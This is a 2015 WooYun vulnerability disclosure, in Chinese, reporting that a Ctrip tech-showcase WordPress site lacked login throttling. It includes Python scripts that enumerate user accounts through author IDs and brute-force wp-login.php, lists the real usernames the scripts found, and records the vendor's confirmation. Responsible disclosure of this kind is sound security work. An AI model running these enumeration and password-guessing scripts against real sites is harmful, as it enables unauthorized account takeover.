当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-099695

漏洞标题:携程某管理系统存在缺陷导致无限装库之3 (附验证脚本与结果)

相关厂商:携程旅行网

漏洞作者: 黑暗游侠

提交时间:2015-03-06 11:09

修复时间:2015-04-25 15:52

公开时间:2015-04-25 15:52

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-06: 该漏洞正等待厂商内部评估
2015-03-06: 厂商已经确认,与白帽子共同解决该漏洞中,漏洞信息仅向厂商公开
2015-03-26: 细节向核心白帽子及相关领域专家公开
2015-04-05: 细节向普通白帽子公开
2015-04-15: 细节向实习白帽子公开
2015-04-25: 细节向公众公开

简要描述:

duang 特技 csrc 万能的

详细说明:

携程技术中心:
http://techshow.ctrip.com/
采用wordpress,并且后台未做登录限制和验证

漏洞证明:

但是二次开发过的,wpscan是没办法枚举用户的
验证脚本:

def getUser():
users = []
pattern = re.compile(r'author-(\S+) author-')
file1 = open('userlist','w')
response = None
for i in range(1, 200):
print "start" + str(i) + "page:"
params = urllib.urlencode({"author":i})
response = gc.get_url_content('http://techshow.ctrip.com//?author=', data=params)
if(response != None):
content = response.decode("utf-8")
tmpUsers = pyq(content).find("body").attr("class")
match = pattern.search(tmpUsers)
if match != None:
print match.group(1)
file1.write("\n" + str(i) + ":" + match.group(1))
else:
print "error";
else:
print 'none'

file1.close();


Result:

admin
leo
junyili
ctriptest


Fuzzing:

def get_password(url,username,password):
try:
post_data = {"log":username,"pwd":password,"wp-submit":"%E7%99%BB%E5%BD%95","redirect_to":url+"wp-admin%2F","test":"1"}
url = url+"wp-login.php"
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
opener.addheaders = [('Cookie','test_cookie=WP+Cookie+check')]
urllib2.install_opener(opener)
post_data = urllib.urlencode(post_data)
req = urllib2.Request(url)
res = urllib2.urlopen(req,post_data)
html = res.read()
if re.search(r'<div id="login_error">',html):
return
else:
print "success:%s : %s"%(username,password)
return
except:
return


导入字典,自行测试修复

修复方案:

版权声明:转载请注明来源 黑暗游侠@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-03-06 15:50

厂商回复:

漏洞已确认真实存在,并已安排人处理。
duang 特技 csrc 万能的
十分感谢。

最新状态:

暂无